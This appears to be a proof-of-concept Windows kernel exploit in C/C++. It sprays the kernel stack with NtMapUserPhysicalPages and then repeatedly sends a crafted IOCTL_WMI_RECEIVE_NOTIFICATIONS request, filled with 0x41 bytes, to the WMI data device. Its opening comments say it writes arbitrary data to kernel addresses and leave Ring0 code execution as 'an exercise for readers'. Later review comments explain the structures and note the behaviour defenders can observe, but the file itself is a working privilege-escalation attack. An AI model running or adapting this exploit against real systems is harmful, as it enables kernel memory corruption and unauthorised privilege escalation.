// with this code we can write custom data to custom address in kernel
// getting Ring0 code execution in this situation is so simple, an exercise for readers
#include <windows.h>
#include <winioctl.h>
// One handle-sized value overlaid with three views: the native HANDLE, a
// 64-bit integer and a 32-bit integer. Only the .Handle member is written
// by the code below (see main).
typedef union {
    HANDLE Handle;
    ULONG64 Handle64;
    ULONG32 Handle32;
}
HANDLE3264, * PHANDLE3264;
// Input buffer layout handed to the WMI data device with
// IOCTL_WMI_RECEIVE_NOTIFICATIONS (see main). This is not a public SDK
// definition; the field meanings below come from the original comments only.
// NOTE(review): the layout is presumably version-specific — nothing here
// validates it against the running kernel.
typedef struct {
    //
    // List of guid notification handles
    //
    ULONG HandleCount;                                   // main sets this to 0
    ULONG Action;                                        // main sets RECEIVE_ACTION_CREATE_THREAD
    HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
    HANDLE3264 UserModeProcess;                          // main stores GetCurrentProcess() here
    HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, * PWMIRECEIVENOTIFICATION;
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
// Open-GUID request block. Declared for completeness; it is not referenced
// anywhere in this file.
typedef struct {
    IN VOID * ObjectAttributes;
    IN ACCESS_MASK DesiredAccess;
    OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, * PWMIOPENGUIDBLOCK;
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
// Prototype for the native NtMapUserPhysicalPages export, declared extern "C"
// so the C++ compiler does not mangle the name at link time. The return value
// is declared ULONG here and is ignored by the only caller (SprayKernelStack).
// NOTE(review): STDCALL is not a macro I can find in the public Windows SDK
// headers — confirm the build environment defines it (e.g. as __stdcall),
// otherwise this declaration will not compile.
extern "C" ULONG STDCALL
NtMapUserPhysicalPages(
    PVOID BaseAddress,
    ULONG NumberOfPages,
    PULONG PageFrameNumbers
);
// Fills a 4 KiB stack buffer with 'B' and passes it to NtMapUserPhysicalPages
// both as the base address and as the page-frame-number array (4096 / sizeof
// DWORD entries). The call's result is discarded; the function name indicates
// the intent is only to leave known bytes on the kernel stack before the IOCTL
// in main is issued.
VOID SprayKernelStack() {
    BYTE buffer[4096];
    memset(buffer, 'B', sizeof(buffer));
    NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
// Entry point. Builds one WMIRECEIVENOTIFICATION request, opens the
// \\.\WMIDataDevice device and then loops: spray the kernel stack, send
// IOCTL_WMI_RECEIVE_NOTIFICATIONS. The loop has no exit of its own; it ends
// only when DeviceIoControl fails (return 1) or the process dies.
// Returns 0 if the device could not be opened, 1 on the first failed IOCTL.
// For defenders: the observable behaviour is a user-mode process opening
// \\.\WMIDataDevice and issuing this IOCTL repeatedly.
int main() {
    DWORD dwBytesReturned;                 // written by DeviceIoControl, never read
    HANDLE threadhandle;                   // unused
    WMIRECEIVENOTIFICATION buffer;         // request sent to the driver
    CHAR OutPut[1000];                     // output buffer for the IOCTL; contents never inspected
    // Fill the whole request with 0x41 first, then override the fields that
    // are set deliberately; everything else (UserModeCallback, Handles[])
    // stays 0x41414141.
    memset( &buffer, '\x41', sizeof(buffer)); // set ecx to 0x41414141
    buffer.HandleCount = 0;
    buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
    buffer.UserModeProcess.Handle = GetCurrentProcess();   // pseudo-handle for this process
    // hDriver is never closed on either return path; the process exit reclaims it.
    HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDriver != INVALID_HANDLE_VALUE) {
        while (TRUE) {
            SprayKernelStack();
            // &OutPut is CHAR (*)[1000]; it converts to LPVOID implicitly and points
            // at the same address as OutPut.
            if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
                return 1;
            }
        }
    }
    return 0;
}